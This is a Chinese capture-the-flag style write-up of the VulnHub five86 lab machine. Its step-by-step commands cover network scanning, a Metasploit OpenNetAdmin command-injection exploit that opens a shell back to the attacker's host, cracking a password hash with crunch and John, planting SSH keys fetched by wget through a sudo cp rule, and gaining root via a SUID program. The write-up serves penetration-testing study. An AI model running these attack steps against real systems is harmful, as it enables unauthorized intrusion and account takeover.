今天实践的是vulnhub的five86镜像,下载地址,
https://download.vulnhub.com/five86/Five86-1.zip,
用workstation导入成功,先做地址扫描,
sudo netdiscover -r 192.168.137.0/24,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.121,
直接访问扫描出来的url,http://192.168.137.121/ona,
去metasploit搜索可利用的攻击模块,search OpenNetAdmin,
use exploit/unix/webapp/opennetadmin_ping_cmd_injection
set RHOSTS 192.168.137.121
set LHOST 192.168.137.141
exploit
拿到shell,不是root,需要提权,转成可交互的shell,
python -c 'import pty; pty.spawn("/bin/bash")',
查看到web目录下有个douglas账户,密码是哈希加密的,
给了提示,密码是10个字符,包含aefhrt,
使用crunch生成一个字典,crunch 10 10 aefhrt > dict.txt,
把密码的哈希值放到单独的文件里,
echo '$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > hash,
用john进行破解,john --wordlist=./dict.txt hash,
得到密码明文,fatherrrrr,用账户douglas/fatherrrrr进行ssh登录,
sudo -l发现当前账户可以jen的权限执行cp命令,
用putty做个公私钥对儿,把公钥拷贝到kali攻击机上,authorized_keys,
kali攻击机上开启http下载服务,python2 -m SimpleHTTPServer,
在靶机上,cd /tmp,
wget http://192.168.137.141:8000/authorized_keys,
chmod 777 authorized_keys,
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh,
再用putty以jen的账户通过公钥认证登录,
收到一封邮件,查看内容,得到账户,moss/Fire!Fire!,
再次以新的账户ssh登录,
查找以root权限执行的文件,find / -perm -u=s -type f 2>/dev/null,
看到有/home/moss/.games/upyourgame,
cd /home/moss/.games,./upyourgame,回答各种问题,得到新shell,
id确认一下是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之five86的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论